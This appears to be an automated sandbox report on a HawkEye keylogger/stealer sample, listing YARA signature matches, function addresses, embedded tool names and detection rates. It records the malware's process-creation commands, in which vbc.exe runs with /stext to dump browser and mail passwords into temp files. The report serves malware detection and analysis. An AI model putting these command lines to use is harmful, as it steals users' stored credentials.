                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.35439a8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.303f17c.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0000000B.00000002.520764467.0000000008080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F21400_2_017F2140
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F30500_2_017F3050
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F10200_2_017F1020
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F04800_2_017F0480
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F17900_2_017F1790
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017FBFB00_2_017FBFB0
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F31740_2_017F3174
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F31490_2_017F3149
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F21300_2_017F2130
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F51000_2_017F5100
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F30310_2_017F3031
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017FF0100_2_017FF010
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F30FC0_2_017F30FC
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F50F00_2_017F50F0
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F53080_2_017F5308
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F33F40_2_017F33F4
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F52F80_2_017F52F8
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F55480_2_017F5548
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F55380_2_017F5538
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F35190_2_017F3519
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F04710_2_017F0471
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F34010_2_017F3401
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F57600_2_017F5760
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F57500_2_017F5750
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F17810_2_017F1781
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017FC6080_2_017FC608
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F4A580_2_017F4A58
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F4A480_2_017F4A48
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017FDA000_2_017FDA00
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F4D580_2_017F4D58
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F4D480_2_017F4D48
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F0F7D0_2_017F0F7D
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F3EE00_2_017F3EE0
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_017F3ED10_2_017F3ED1
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_05A404480_2_05A40448
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_05A4E5A80_2_05A4E5A8
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_05A4E5B80_2_05A4E5B8
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_05A4043B0_2_05A4043B
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_05A4C0FC0_2_05A4C0FC
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_09F156D00_2_09F156D0
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_09F100400_2_09F10040
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 0_2_09F107140_2_09F10714
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_078CB4E011_2_078CB4E0
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_078CEEC811_2_078CEEC8
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_078CBDB011_2_078CBDB0
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_078CB19811_2_078CB198
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeCode function: 11_2_078C002611_2_078C0026
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040441914_2_00404419
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040451614_2_00404516
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0041353814_2_00413538
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004145A114_2_004145A1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040E63914_2_0040E639
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004337AF14_2_004337AF
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_004399B114_2_004399B1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0043DAE714_2_0043DAE7
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00405CF614_2_00405CF6
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00403F8514_2_00403F85
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00411F9914_2_00411F99
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404DDB15_2_00404DDB
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_0040BD8A15_2_0040BD8A
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404E4C15_2_00404E4C
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404EBD15_2_00404EBD
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 15_2_00404F4E15_2_00404F4E
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413F8E appears 66 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00413E2D appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00442A90 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 004141D6 appears 88 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: String function: 00411538 appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,14_2_00408836
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess Stats: CPU usage > 98%
                  Source: tDb0ggawON.exeBinary or memory string: OriginalFilename vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.301588725.00000000010E2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameResourceHelp.exe: vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.311192857.000000000AAC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSharpStructures.dll@ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.302607622.00000000034EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000000.295618911.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameResourceHelp.exe: vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000000.297629080.0000000000482000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs tDb0ggawON.exe
                  Source: tDb0ggawON.exeBinary or memory string: OriginalFilenameResourceHelp.exe: vs tDb0ggawON.exe
                  Source: tDb0ggawON.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: tDb0ggawON.exeVirustotal: Detection: 33%
                  Source: tDb0ggawON.exeMetadefender: Detection: 14%
                  Source: tDb0ggawON.exeReversingLabs: Detection: 39%
                  Source: tDb0ggawON.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\tDb0ggawON.exe "C:\Users\user\Desktop\tDb0ggawON.exe"
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Users\user\Desktop\tDb0ggawON.exe C:\Users\user\Desktop\tDb0ggawON.exe
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Users\user\Desktop\tDb0ggawON.exe C:\Users\user\Desktop\tDb0ggawON.exeJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"Jump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Users\user\Desktop\tDb0ggawON.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tDb0ggawON.exe.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\bhvED7C.tmpJump to behavior
                  Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@7/5@2/2
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00415F87 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,14_2_00415F87
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
